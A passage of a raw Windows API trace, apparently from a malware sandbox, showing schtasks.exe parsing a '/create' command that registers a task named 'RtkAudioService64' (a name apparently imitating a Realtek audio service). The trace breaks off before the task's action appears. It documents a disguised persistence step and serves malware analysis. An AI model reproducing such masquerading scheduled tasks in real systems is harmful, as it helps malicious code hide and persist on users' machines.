(HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b27d0 [0210.289] GetProcessHeap () returned 0x1b0000 [0210.289] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b27f0 [0210.289] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.858] RtlRestoreLastWin32Error () returned 0x0 [0211.858] GetProcessHeap () returned 0x1b0000 [0211.858] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9670 [0211.858] GetProcessHeap () returned 0x1b0000 [0211.858] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b94b0 [0211.858] GetProcessHeap () returned 0x1b0000 [0211.858] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9450 [0211.858] GetProcessHeap () returned 0x1b0000 [0211.858] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9370 [0211.858] GetProcessHeap () returned 0x1b0000 [0211.858] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9570 [0211.859] GetProcessHeap () returned 0x1b0000 [0211.859] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b74f8 [0211.859] _memicmp (_Buf1=0x1b74f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.859] GetProcessHeap () returned 0x1b0000 [0211.859] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x208) returned 0x1b8d28 [0211.859] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b8d28, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0211.860] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdfb04 | out: lpdwHandle=0xdfb04) returned 0x76c [0211.870] GetProcessHeap () returned 0x1b0000 [0211.870] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x776) returned 0x1b9e00 [0211.871] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x1b9e00 | out: lpData=0x1b9e00) returned 1 [0211.871] VerQueryValueW (in: pBlock=0x1b9e00, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdfb0c, puLen=0xdfb10 | out: lplpBuffer=0xdfb0c*=0x1ba1b0, puLen=0xdfb10) returned 1 [0211.897] _memicmp (_Buf1=0x1b74f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.898] _vsnwprintf (in: _Buffer=0x1b8d28, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdfaf0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0211.898] VerQueryValueW (in: pBlock=0x1b9e00, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdfb1c, puLen=0xdfb18 | out: lplpBuffer=0xdfb1c*=0x1b9fe0, puLen=0xdfb18) returned 1 [0211.902] lstrlenW (lpString="schtasks.exe") returned 12 [0211.903] lstrlenW (lpString="schtasks.exe") returned 12 [0211.903] lstrlenW (lpString=".EXE") returned 4 [0211.903] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0211.904] lstrlenW (lpString="schtasks.exe") returned 12 [0211.904] lstrlenW (lpString=".EXE") returned 4 [0211.904] _memicmp (_Buf1=0x1b74f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.904] lstrlenW (lpString="schtasks") returned 8 [0211.904] GetProcessHeap () returned 0x1b0000 [0211.904] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9470 [0211.904] GetProcessHeap () returned 0x1b0000 [0211.904] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b93b0 [0211.908] GetProcessHeap () returned 0x1b0000 [0211.908] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9590 [0211.908] GetProcessHeap () returned 0x1b0000 [0211.908] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b93d0 [0211.908] GetProcessHeap () returned 0x1b0000 [0211.908] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b73a8 [0211.908] _memicmp (_Buf1=0x1b73a8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.908] GetProcessHeap () returned 0x1b0000 [0211.908] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xa0) returned 0x1b6a28 [0211.908] GetProcessHeap () returned 0x1b0000 [0211.908] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9690 [0211.908] GetProcessHeap () returned 0x1b0000 [0211.908] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b95b0 [0211.908] GetProcessHeap () returned 0x1b0000 [0211.908] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b94f0 [0211.908] GetProcessHeap () returned 0x1b0000 [0211.908] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b73c0 [0211.908] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.908] GetProcessHeap () returned 0x1b0000 [0211.908] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x200) returned 0x1ba7e0 [0211.909] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0211.909] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0211.909] GetProcessHeap () returned 0x1b0000 [0211.909] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x30) returned 0x1b6ad0 [0211.909] _vsnwprintf (in: _Buffer=0x1b6a28, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdfaf4 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0211.909] GetProcessHeap () returned 0x1b0000 [0211.909] GetProcessHeap () returned 0x1b0000 [0211.909] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b9e00) returned 1 [0211.910] GetProcessHeap () returned 0x1b0000 [0211.910] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b9e00) returned 0x776 [0211.910] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b9e00) returned 1 [0211.910] RtlRestoreLastWin32Error () returned 0x0 [0211.910] GetThreadLocale () returned 0x409 [0211.910] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0211.910] lstrlenW (lpString="?") returned 1 [0211.910] GetThreadLocale () returned 0x409 [0211.910] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0211.910] lstrlenW (lpString="create") returned 6 [0211.910] GetThreadLocale () returned 0x409 [0211.910] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0211.910] lstrlenW (lpString="delete") returned 6 [0211.910] GetThreadLocale () returned 0x409 [0211.910] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0211.910] lstrlenW (lpString="query") returned 5 [0211.910] GetThreadLocale () returned 0x409 [0211.911] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0211.911] lstrlenW (lpString="change") returned 6 [0211.911] GetThreadLocale () returned 0x409 [0211.911] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0211.911] lstrlenW (lpString="run") returned 3 [0211.911] GetThreadLocale () returned 0x409 [0211.911] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0211.911] lstrlenW (lpString="end") returned 3 [0211.911] GetThreadLocale () returned 0x409 [0211.911] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0211.911] lstrlenW (lpString="showsid") returned 7 [0211.911] GetThreadLocale () returned 0x409 [0211.911] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0211.911] RtlRestoreLastWin32Error () returned 0x0 [0211.911] RtlRestoreLastWin32Error () returned 0x0 [0211.911] lstrlenW (lpString="/create") returned 7 [0211.911] lstrlenW (lpString="-/") returned 2 [0211.911] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0211.911] lstrlenW (lpString="?") returned 1 [0211.911] lstrlenW (lpString="?") returned 1 [0211.911] GetProcessHeap () returned 0x1b0000 [0211.912] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b7528 [0211.912] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.912] GetProcessHeap () returned 0x1b0000 [0211.912] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xa) returned 0x1b73f0 [0211.912] lstrlenW (lpString="create") returned 6 [0211.912] GetProcessHeap () returned 0x1b0000 [0211.912] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b74c8 [0211.912] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.912] GetProcessHeap () returned 0x1b0000 [0211.912] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b96b0 [0211.912] _vsnwprintf (in: _Buffer=0x1b73f0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0211.912] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0211.912] lstrlenW (lpString="|?|") returned 3 [0211.912] lstrlenW (lpString="|create|") returned 8 [0211.912] RtlRestoreLastWin32Error () returned 0x490 [0211.912] lstrlenW (lpString="create") returned 6 [0211.912] lstrlenW (lpString="create") returned 6 [0211.912] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.912] GetProcessHeap () returned 0x1b0000 [0211.912] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b73f0) returned 1 [0211.912] GetProcessHeap () returned 0x1b0000 [0211.912] RtlReAllocateHeap (Heap=0x1b0000, Flags=0xc, Ptr=0x1b73f0, Size=0x14) returned 0x1b95d0 [0211.913] lstrlenW (lpString="create") returned 6 [0211.913] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.913] _vsnwprintf (in: _Buffer=0x1b95d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0211.913] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0211.913] lstrlenW (lpString="|create|") returned 8 [0211.913] lstrlenW (lpString="|create|") returned 8 [0211.913] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0211.913] RtlRestoreLastWin32Error () returned 0x0 [0211.913] RtlRestoreLastWin32Error () returned 0x0 [0211.913] RtlRestoreLastWin32Error () returned 0x0 [0211.913] lstrlenW (lpString="/tn") returned 3 [0211.913] lstrlenW (lpString="-/") returned 2 [0211.913] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0211.913] lstrlenW (lpString="?") returned 1 [0211.913] lstrlenW (lpString="?") returned 1 [0211.913] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.913] lstrlenW (lpString="tn") returned 2 [0211.913] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.913] _vsnwprintf (in: _Buffer=0x1b95d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0211.914] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0211.914] lstrlenW (lpString="|?|") returned 3 [0211.914] lstrlenW (lpString="|tn|") returned 4 [0211.914] RtlRestoreLastWin32Error () returned 0x490 [0211.914] lstrlenW (lpString="create") returned 6 [0211.914] lstrlenW (lpString="create") returned 6 [0211.914] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.914] lstrlenW (lpString="tn") returned 2 [0211.914] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.914] _vsnwprintf (in: _Buffer=0x1b95d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0211.914] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0211.914] lstrlenW (lpString="|create|") returned 8 [0211.923] lstrlenW (lpString="|tn|") returned 4 [0211.923] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0211.923] RtlRestoreLastWin32Error () returned 0x490 [0211.923] lstrlenW (lpString="delete") returned 6 [0211.923] lstrlenW (lpString="delete") returned 6 [0211.923] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.923] lstrlenW (lpString="tn") returned 2 [0211.923] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.923] _vsnwprintf (in: _Buffer=0x1b95d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0211.923] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0211.924] lstrlenW (lpString="|delete|") returned 8 [0211.924] lstrlenW (lpString="|tn|") returned 4 [0211.924] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0211.924] RtlRestoreLastWin32Error () returned 0x490 [0211.924] lstrlenW (lpString="query") returned 5 [0211.924] lstrlenW (lpString="query") returned 5 [0211.924] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.924] lstrlenW (lpString="tn") returned 2 [0211.924] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.924] _vsnwprintf (in: _Buffer=0x1b95d0, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0211.924] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0211.924] lstrlenW (lpString="|query|") returned 7 [0211.924] lstrlenW (lpString="|tn|") returned 4 [0211.924] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0211.924] RtlRestoreLastWin32Error () returned 0x490 [0211.924] lstrlenW (lpString="change") returned 6 [0211.924] lstrlenW (lpString="change") returned 6 [0211.924] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.924] lstrlenW (lpString="tn") returned 2 [0211.925] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.925] _vsnwprintf (in: _Buffer=0x1b95d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0211.925] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0211.925] lstrlenW (lpString="|change|") returned 8 [0211.925] lstrlenW (lpString="|tn|") returned 4 [0211.925] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0211.925] RtlRestoreLastWin32Error () returned 0x490 [0211.925] lstrlenW (lpString="run") returned 3 [0211.925] lstrlenW (lpString="run") returned 3 [0211.925] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.925] lstrlenW (lpString="tn") returned 2 [0211.925] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.925] _vsnwprintf (in: _Buffer=0x1b95d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0211.925] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0211.926] lstrlenW (lpString="|run|") returned 5 [0211.926] lstrlenW (lpString="|tn|") returned 4 [0211.926] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0211.926] RtlRestoreLastWin32Error () returned 0x490 [0211.926] lstrlenW (lpString="end") returned 3 [0211.926] lstrlenW (lpString="end") returned 3 [0211.926] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.926] lstrlenW (lpString="tn") returned 2 [0211.926] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.926] _vsnwprintf (in: _Buffer=0x1b95d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0211.926] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0211.926] lstrlenW (lpString="|end|") returned 5 [0211.926] lstrlenW (lpString="|tn|") returned 4 [0211.926] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0211.926] RtlRestoreLastWin32Error () returned 0x490 [0211.926] lstrlenW (lpString="showsid") returned 7 [0211.926] lstrlenW (lpString="showsid") returned 7 [0211.926] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.926] GetProcessHeap () returned 0x1b0000 [0211.926] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b95d0) returned 1 [0211.927] GetProcessHeap () returned 0x1b0000 [0211.927] RtlReAllocateHeap (Heap=0x1b0000, Flags=0xc, Ptr=0x1b95d0, Size=0x16) returned 0x1b9730 [0211.927] lstrlenW (lpString="tn") returned 2 [0211.927] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.927] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0211.927] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0211.927] lstrlenW (lpString="|showsid|") returned 9 [0211.927] lstrlenW (lpString="|tn|") returned 4 [0211.927] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0211.927] RtlRestoreLastWin32Error () returned 0x490 [0211.927] RtlRestoreLastWin32Error () returned 0x490 [0211.927] RtlRestoreLastWin32Error () returned 0x0 [0211.927] lstrlenW (lpString="/tn") returned 3 [0211.927] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0211.927] RtlRestoreLastWin32Error () returned 0x490 [0211.927] RtlRestoreLastWin32Error () returned 0x0 [0211.928] lstrlenW (lpString="/tn") returned 3 [0211.928] GetProcessHeap () returned 0x1b0000 [0211.928] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x8) returned 0x1b6cb8 [0211.928] GetProcessHeap () returned 0x1b0000 [0211.928] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9550 [0211.928] RtlRestoreLastWin32Error () returned 0x0 [0211.928] RtlRestoreLastWin32Error () returned 0x0 [0211.928] lstrlenW (lpString="RtkAudioService64") returned 17 [0211.928] lstrlenW (lpString="-/") returned 2 [0211.928] StrChrIW (lpStart="-/", wMatch=0x4630052) returned 0x0 [0211.928] RtlRestoreLastWin32Error () returned 0x490 [0211.928] RtlRestoreLastWin32Error () returned 0x490 [0211.928] RtlRestoreLastWin32Error () returned 0x0 [0211.928] lstrlenW (lpString="RtkAudioService64") returned 17 [0211.928] StrChrIW (lpStart="RtkAudioService64", wMatch=0x3a) returned 0x0 [0211.928] RtlRestoreLastWin32Error () returned 0x490 [0211.928] RtlRestoreLastWin32Error () returned 0x0 [0211.929] lstrlenW (lpString="RtkAudioService64") returned 17 [0211.929] GetProcessHeap () returned 0x1b0000 [0211.929] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x24) returned 0x1b9008 [0211.929] GetProcessHeap () returned 0x1b0000 [0211.929] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9710 [0211.929] RtlRestoreLastWin32Error () returned 0x0 [0211.929] RtlRestoreLastWin32Error () returned 0x0 [0211.929] lstrlenW (lpString="/tr") returned 3 [0211.929] lstrlenW (lpString="-/") returned 2 [0211.929] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0211.929] lstrlenW (lpString="?") returned 1 [0211.929] lstrlenW (lpString="?") returned 1 [0211.929] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.929] lstrlenW (lpString="tr") returned 2 [0211.929] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.929] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0211.929] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0211.929] lstrlenW (lpString="|?|") returned 3 [0211.929] lstrlenW (lpString="|tr|") returned 4 [0211.929] RtlRestoreLastWin32Error () returned 0x490 [0211.929] lstrlenW (lpString="create") returned 6 [0211.930] lstrlenW (lpString="create") returned 6 [0211.930] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.930] lstrlenW (lpString="tr") returned 2 [0211.930] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.930] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0211.930] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0211.930] lstrlenW (lpString="|create|") returned 8 [0211.930] lstrlenW (lpString="|tr|") returned 4 [0211.930] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0211.930] RtlRestoreLastWin32Error () returned 0x490 [0211.946] lstrlenW (lpString="delete") returned 6 [0211.946] lstrlenW (lpString="delete") returned 6 [0211.946] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.946] lstrlenW (lpString="tr") returned 2 [0211.946] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.946] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0211.949] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0211.949] lstrlenW (lpString="|delete|") returned 8 [0211.949] lstrlenW (lpString="|tr|") returned 4 [0211.949] StrStrIW (lpFirst="|delete|", lpSrch="|tr|") returned 0x0 [0211.949] RtlRestoreLastWin32Error () returned 0x490 [0211.949] lstrlenW (lpString="query") returned 5 [0211.949] lstrlenW (lpString="query") returned 5 [0211.950] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.950] lstrlenW (lpString="tr") returned 2 [0211.950] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.950] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0211.950] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0211.950] lstrlenW (lpString="|query|") returned 7 [0211.950] lstrlenW (lpString="|tr|") returned 4 [0211.950] StrStrIW (lpFirst="|query|", lpSrch="|tr|") returned 0x0 [0211.950] RtlRestoreLastWin32Error () returned 0x490 [0211.950] lstrlenW (lpString="change") returned 6 [0211.950] lstrlenW (lpString="change") returned 6 [0211.950] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.950] lstrlenW (lpString="tr") returned 2 [0211.950] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.950] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0211.950] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0211.950] lstrlenW (lpString="|change|") returned 8 [0211.950] lstrlenW (lpString="|tr|") returned 4 [0211.950] StrStrIW (lpFirst="|change|", lpSrch="|tr|") returned 0x0 [0211.951] RtlRestoreLastWin32Error () returned 0x490 [0211.951] lstrlenW (lpString="run") returned 3 [0211.951] lstrlenW (lpString="run") returned 3 [0211.951] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.951] lstrlenW (lpString="tr") returned 2 [0211.951] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.951] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0211.951] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0211.951] lstrlenW (lpString="|run|") returned 5 [0211.951] lstrlenW (lpString="|tr|") returned 4 [0211.951] StrStrIW (lpFirst="|run|", lpSrch="|tr|") returned 0x0 [0211.951] RtlRestoreLastWin32Error () returned 0x490 [0211.951] lstrlenW (lpString="end") returned 3 [0211.951] lstrlenW (lpString="end") returned 3 [0211.951] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.951] lstrlenW (lpString="tr") returned 2 [0211.951] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.952] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0211.952] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0211.952] lstrlenW (lpString="|end|") returned 5 [0211.952] lstrlenW (lpString="|tr|") returned 4 [0211.952] StrStrIW (lpFirst="|end|", lpSrch="|tr|") returned 0x0 [0211.952] RtlRestoreLastWin32Error () returned 0x490 [0211.952] lstrlenW (lpString="showsid") returned 7 [0211.952] lstrlenW (lpString="showsid") returned 7 [0211.952] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.952] lstrlenW (lpString="tr") returned 2 [0211.952] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.952] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0211.953] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0211.953] lstrlenW (lpString="|showsid|") returned 9 [0211.953] lstrlenW (lpString="|tr|") returned 4 [0211.953] StrStrIW (lpFirst="|showsid|", lpSrch="|tr|") returned 0x0 [0211.953] RtlRestoreLastWin32Error () returned 0x490 [0211.953] RtlRestoreLastWin32Error () returned 0x490 [0211.953] RtlRestoreLastWin32Error () returned 0x0 [0211.953] lstrlenW (lpString="/tr") returned 3 [0211.953] StrChrIW (lpStart="/tr", wMatch=0x3a) returned 